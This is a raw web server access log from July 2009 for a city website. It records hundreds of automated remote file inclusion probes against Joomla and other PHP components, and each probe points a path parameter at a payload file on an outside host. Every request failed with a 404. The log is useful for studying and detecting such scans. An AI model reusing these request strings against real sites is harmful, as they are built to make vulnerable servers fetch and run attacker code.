195.34.78.110 - - [01/Jul/2009:02:10:31 -0700] "GET /logs////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:31 -0700] "GET ///components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:31 -0700] "GET /logs/access_080531.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:52 -0700] "GET /logs/access.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:53 -0700] "GET /logs/access.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:10:54 -0700] "GET /logs/access.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:02:11:07 -0700] "GET /logs/access.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:11:26 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:11:48 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:12:24 -0700] "GET /logs/access_080330.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:12:29 -0700] "GET /logs/access.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:12:33 -0700] "GET /logs/access_080330.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:12:36 -0700] "GET /logs/access_080330.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:12:37 -0700] "GET /logs/access.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.34.78.110 - - [01/Jul/2009:02:12:40 -0700] "GET /logs/access.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:02:14:12 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:14:45 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.251.217.4 - - [01/Jul/2009:02:16:02 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [01/Jul/2009:02:16:52 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.205.41.147 - - [01/Jul/2009:02:17:49 -0700] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.205.41.147 - - [01/Jul/2009:02:17:49 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.205.41.147 - - [01/Jul/2009:02:17:49 -0700] "GET /logs/access.log%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:02:21:25 -0700] "GET /skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:02:21:25 -0700] "GET /logs/access.log//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:02:21:25 -0700] "GET /logs//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:02:21:44 -0700] "GET /logs/access_080330.log//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:12 -0700] "GET /logs/access_081001.log//index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:12 -0700] "GET /index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:12 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:14 -0700] "GET /logs/access_081001.log//index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:14 -0700] "GET /index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:14 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.205.41.147 - - [01/Jul/2009:02:23:43 -0700] "GET /logs/access.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:57 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:23:57 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:02:24:51 -0700] "GET /logs/access_080330.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:02:28:10 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:02:28:10 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:02:28:10 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:02:28:16 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:02:30:03 -0700] "GET /logs/access_080531.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:30:26 -0700] "GET /logs/access_080330.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:30:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:30:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
66.249.134.74 - - [01/Jul/2009:02:30:36 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [01/Jul/2009:02:30:53 -0700] "GET /logs/access_080330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [01/Jul/2009:02:30:53 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [01/Jul/2009:02:30:53 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:31:09 -0700] "GET /logs/access_080330.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:31:09 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:31:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:02:31:54 -0700] "GET /logs/access.log%20%20//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.11.66 - - [01/Jul/2009:02:32:20 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:32:40 -0700] "GET /logs/access_080531.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:34:03 -0700] "GET /logs/access_080531.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:40:18 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:40:18 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:40:18 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:40:18 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:40:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:40:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:41:01 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
67.220.199.70 - - [01/Jul/2009:02:41:01 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "cityofarkadelphia.com"
211.189.39.159 - - [01/Jul/2009:02:47:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [01/Jul/2009:02:47:07 -0700] "GET /skin/zero_vote/error.php?dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [01/Jul/2009:02:47:07 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:47:43 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:47:44 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:47:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.11.27 - - [01/Jul/2009:02:49:34 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:50:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:50:52 -0700] "GET /logs/access_080330.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:50:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:02:51:07 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.137.160.12 - - [01/Jul/2009:02:52:02 -0700] "GET /index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.137.160.12 - - [01/Jul/2009:02:52:02 -0700] "GET /logs/access.log%20%20/index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.137.160.12 - - [01/Jul/2009:02:52:02 -0700] "GET /logs/index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:02:52:40 -0700] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:02:52:40 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:02:54:36 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:02:55:15 -0700] "GET /logs/access_080531.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [01/Jul/2009:02:57:57 -0700] "GET /logs/access_080531.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:15 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:16 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:16 -0700] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:28 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:28 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:28 -0700] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:48 -0700] "GET /logs/access_080330.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:02:59:52 -0700] "GET /logs/access_080330.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.137.160.12 - - [01/Jul/2009:03:03:27 -0700] "GET /logs/access.log/index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:26 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:26 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:26 -0700] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:30 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:30 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:30 -0700] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:31 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:31 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:31 -0700] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:53 -0700] "GET /logs/access_080330.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:55 -0700] "GET /logs/access_080330.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:56 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:56 -0700] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:05:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:06:06 -0700] "GET /logs/access_080330.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
